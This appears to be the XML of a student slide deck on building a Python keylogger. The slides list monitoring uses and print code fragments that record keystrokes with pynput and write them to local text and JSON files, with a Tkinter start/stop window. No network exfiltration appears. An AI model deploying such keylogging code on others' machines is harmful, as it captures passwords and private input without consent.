            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-IN"/>
              <a:t>Above like that you can install it in command prompt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-IN"/>
              <a:t>By these two libraries we cannot get error in python code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048645" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5976351"/>
            <a:ext cx="551167"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5" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2637980"/>
            <a:ext cx="1699407" cy="213378"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097156" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4843462" y="3072846"/>
            <a:ext cx="2482068" cy="17211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flipH="1">
            <a:off x="2523982" y="1005241"/>
            <a:ext cx="304801"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72083" y="793340"/>
            <a:ext cx="10681335" cy="632224"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" rtlCol="0" tIns="16510" vert="horz" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="25"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-20"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="20"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-235"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-10"/>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="15"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-35"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-10"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-15"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="15"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-35"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-20"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="30"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="15"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-45"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="10"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-25"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="-10"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4000" spc="5"/>
              <a:t>S?</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2195797"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-457200" marL="457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2800" lang="en-US"/>
              <a:t>Parents might use a keylogger to monitor a child's screen time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" marL="457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2800" lang="en-US"/>
              <a:t> Companies often use keylogger software as part of employee monitoring software to help track employee productivity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" marL="457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2800" lang="en-US"/>
              <a:t> Information technology departments can use keylogger software to troubleshoot issues on a device.</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2800" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048651" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5976351"/>
            <a:ext cx="551167"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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="1288732"/>
            <a:ext cx="10018713" cy="546735"/>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sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048655" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="5486400" cy="4001095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="60000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="3400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="3400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0" sz="3400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0" sz="3400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3400" lang="en-IN"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0" sz="2000" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048656" name="object 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5976351"/>
            <a:ext cx="551167"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61" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="5232202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="95000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="10681335" cy="4431983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" lang="en-IN"/>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M2006C3MII</dc:creator>
  <cp:lastModifiedBy>M Leelasai</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-02T18:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T09:34:59Z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92e294f6020d4dc4aac5029e6101fa78</vt:lpwstr>
  </property>
</Properties>
</file>